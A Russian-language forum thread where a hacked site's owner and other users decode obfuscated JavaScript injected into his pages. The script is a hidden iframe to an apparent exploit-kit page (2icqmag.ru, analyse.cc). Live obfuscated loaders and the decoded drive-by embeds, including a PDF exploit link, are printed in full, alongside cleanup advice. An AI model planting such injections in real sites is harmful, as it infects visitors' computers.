Взломали сайт, в индексы вставили код

<script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&43&7:&74&82&7e&72&78&3f&83&86&3g&86&81&75&6g&8:&76&84&3g&7:&7f&75&76&89&3f&81&79&81&33&31&88&7:&75&85&79&4e&33&41&33&31&79&76&7:&78&79&85&4e&33&41&33&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&4c&33&4f&4d&3g&7:&77&83&72&7e&76&4f(**=0tdsjqu?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); </script>

Код удалил. На след день опять код появился. Сменил все пассы на админов и модеров. Удалил скрипт этот. Через день опять этот скрипт появился в индексах.
Подскажите что это за скрипт, что в нем зашифровано? и как от него избавиться?

>как от него избавиться?
проанализировать все скрипты на сервере и исправить баги.
Неумеешь сам - нанимай профи.

Ищи в остальных скриптах левый код и удаляй его.

спасибо за советы.
Теперь мне интересно что это за код? и как его дешифровать?

Код закрипртован.

Взломали сайт, в индексы вставили код

<script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&43&7:&74&82&7e&72&78&3f&83&86&3g&86&81&75&6g&8:&76&84&3g&7:&7f&75&76&89&3f&81&79&81&33&31&88&7:&75&85&79&4e&33&41&33&31&79&76&7:&78&79&85&4e&33&41&33&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&4c&33&4f&4d&3g&7:&77&83&72&7e&76&4f(**=0tdsjqu?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); </script>

Код удалил. На след день опять код появился. Сменил все пассы на админов и модеров. Удалил скрипт этот. Через день опять этот скрипт появился в индексах.
Подскажите что это за скрипт, что в нем зашифровано? и как от него избавиться?


в первую очеред смени все пассы на FTP , то что ты удаляешь этот код это все хрень , сам он туда не вставиться , верно ?! его кто то же прописывает , и вот этот кто то , имеет твой акк на твой ftp , кароче совет > с чистой машины , зайти и поменять все пароли на всех акках ! :cool:

а уж потом чисти скрипты !

Декодированный код
<iframe src="http://2icqmag.ru/upd_yes/index.php" width="0" height="0" style="display:none;"></iframe>=

Это скрытый фрейм, в котором загружаеться "http://2icqmag.ru/upd_yes/index.php"

Прошел по ссылке 2icqmag.ru/upd_yes/index.php

а там след. код:

<style>.D6IAaL1t0535_{display:none}</style>
<b class="D6IAaL1t0535_t" id="t0535_t1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="D6IAaL1t0535_t" id="D6IAaL1t0535_t">100.111.99.117.109.101.110.116.46.119.114.105.116. 101.40.34.60.101.109.98.101.100.32.115.114.99.61.3 9.104.116.116.112.58.47.47.50.105.99.113.109.97.10 3.46.114.117.47.117.112.100.95.121.101.115.47.105. 110.99.108.117.100.101.47.115.112.108.46.112.104.1 12.63.100.111.61.102.111.120.105.116.39.32.119.105 .100.116.104.61.49.32.104.101.105.103.104.116.61.4 8.32.115.116.121.108.101.61.100.105.115.112.108.97 .121.58.110.111.110.101.62.60.47.101.109.98.101.10 0.62.34.41.59</div>
<script>
var t0535_tC89Bwe2bv = document;
t0535_tC89Bwe2bv = t0535_tC89Bwe2bv.getElementById('t0535_t1');
t0535_tC89Bwe2bv = t0535_tC89Bwe2bv.innerHTML;
var t0535_ttrash = "q!w!e!r!t!y!";
t0535_tC89Bwe2bv = t0535_tC89Bwe2bv.replace(/[!|*]/g, "");
t0535_ttrash = t0535_ttrash.replace(/[!]/g,"");
var t0535_tttt = eval(t0535_tC89Bwe2bv);
var t0535_tD81Bwe2b = document.getElementById("D6IAaL1t0535_t");
t0535_ttrash = t0535_ttrash.replace(/[q]/g,"");
t0535_tD81Bwe2b = t0535_tD81Bwe2b.innerHTML;
t0535_tD81Bwe2b = t0535_tD81Bwe2b.replace(/[A-Za-z]/g,function (t0535_tCt0535_t2dbQ){ return String.fromCharCode((((t0535_tCt0535_t2dbQ = t0535_tCt0535_t2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (t0535_tCt0535_t2dbQ & 32) + 65); }).split(".");
t0535_ttrash = t0535_ttrash.replace(/[w]/g,"");
var t0535_tEW81Bwe2b = "!!!";
t0535_tEW81Bwe2b = t0535_tEW81Bwe2b.replace(/[!]/g,"");
for (var t0535_tt0535_t=0; t0535_tt0535_t<t0535_tD81Bwe2b.length; t0535_tt0535_t++){ t0535_tEW81Bwe2b += String.fromCharCode(t0535_tD81Bwe2b[t0535_tt0535_t]); }
t0535_tttt(t0535_tEW81Bwe2b);
</script>
<style>.XD2NJr7set0535_t{display:none;}</style>
<b class="XD2NJr7set0535_t" id="t0535_t1">e!v!al!</b>
<script>window.onerror = return(true);</script>
<div class="XD2NJr7set0535_t" id="XD2NJr7set0535_t">100.111.99.117.109.101.110.116.46.119.114.105.116. 101.40.34.60.101.109.98.101.100.32.115.114.99.61.9 2.34.104.116.116.112.58.47.47.50.105.99.113.109.97 .103.46.114.117.47.117.112.100.95.121.101.115.47.1 05.110.99.108.117.100.101.47.115.112.108.46.112.10 4.112.63.115.116.97.116.61.87.105.110.100.111.119. 115.32.88.80.124.79.112.101.114.97.32.57.46.54.52. 124.82.85.124.56.56.46.50.48.52.46.53.51.46.50.50. 92.34.32.119.105.100.116.104.61.92.34.48.92.34.32. 104.101.105.103.104.116.61.92.34.48.92.34.32.116.1 21.112.101.61.92.34.97.112.112.108.105.99.97.116.1 05.111.110.47.112.100.102.92.34.62.60.47.101.109.9 8.101.100.62.34.41.59</div>
<script>
var t0535_tC89Bwe2bv = document;
t0535_tC89Bwe2bv = t0535_tC89Bwe2bv.getElementById('t0535_t1');
t0535_tC89Bwe2bv = t0535_tC89Bwe2bv.innerHTML;
var t0535_ttrash = "q!w!e!r!t!y!";
t0535_tC89Bwe2bv = t0535_tC89Bwe2bv.replace(/[!|]/g, "");
t0535_ttrash = t0535_ttrash.replace(/[!]/g,"");
var t0535_tttt = eval(t0535_tC89Bwe2bv);
var t0535_tD81Bwe2b = document.getElementById("XD2NJr7set0535_t");
t0535_ttrash = t0535_ttrash.replace(/[q]/g,"");
t0535_tD81Bwe2b = t0535_tD81Bwe2b.innerHTML;
t0535_tD81Bwe2b = t0535_tD81Bwe2b.replace(/[A-Za-z]/g,function (t0535_tCt0535_t2dbQ){ return String.fromCharCode((((t0535_tCt0535_t2dbQ = t0535_tCt0535_t2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (t0535_tCt0535_t2dbQ & 32) + 65); }).split(".");
t0535_ttrash = t0535_ttrash.replace(/[w]/g,"");
var t0535_tEW81Bwe2b = "!!!";
t0535_tEW81Bwe2b = t0535_tEW81Bwe2b.replace(/[!]/g,"");
for (var t0535_tt0535_t=0; t0535_tt0535_t<t0535_tD81Bwe2b.length; t0535_tt0535_t++){ t0535_tEW81Bwe2b += String.fromCharCode(t0535_tD81Bwe2b[t0535_tt0535_t]); }
t0535_tttt(t0535_tEW81Bwe2b);
</script>

этих два скрипта возможно декриптовать?
(чем-то квест напоминает)
Зашел в след раз по этой ссылке м меня перенаправило на http://defaultpage.3fn.net/?htr=sexy-zone.ru

marketing.3fn.net/ru/ - партнерка. Так понимаю в том коде ссылка на рекламу, которую для аккаунта sexy-zone.ru предоставляет партнерка.

твой фреем ссылается на связку сплоитов, а этот код какраз и выдает сплоит под твой браузер, кстате мне пытались pdf сплоит впарить))), если знать точные названия папок на этой ссылке то можно выжать от туда сплоиты...

P.S.

декодировал первую часть скрипта и вот что там было зашифровано:
document.write("<embed src='http://2icqmag.ru/upd_yes/include/spl.php?do=foxit' width=1 height=0 style=display:none></embed>");

P.S.

вторая половина скрипта закодирована:

document.write("<embed src=
:) скрипт раскодирован полностью :)

Забавно. Помимо того что рекламу крутить собрался на сайте, так еще и заразить компы)

Забавно. Помимо того что рекламу крутить собрался на сайте, так еще и заразить компы)

человек сразу дал понять о чем речь идет, и то что если ты прошелся по ссылкам то ты должен был понимать о том куда ты идешь...

Вот такой вирус оставлен в некоторых php файлах после ?><noindex><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3.2("<0 1=\'4://9.5\' 8=\'7:6\'></0>");',10,10,'iframe|src|write|document|http|cc|none| display|style|analyse'.split('|'),0,{}))</script></noindex>



что он означает? помимо того, что это iframe)

там закодирован фреем код <iframe src='http://analyse.cc' style=' display:none'></iframe> который подключает сайт _analyse.cc в данном случае на том адресе прописан редирект на партнерку, а вообще за счет этого кода можно подключить выполнения произвольных сценариев на правленый на посетителей страници с этим кодом.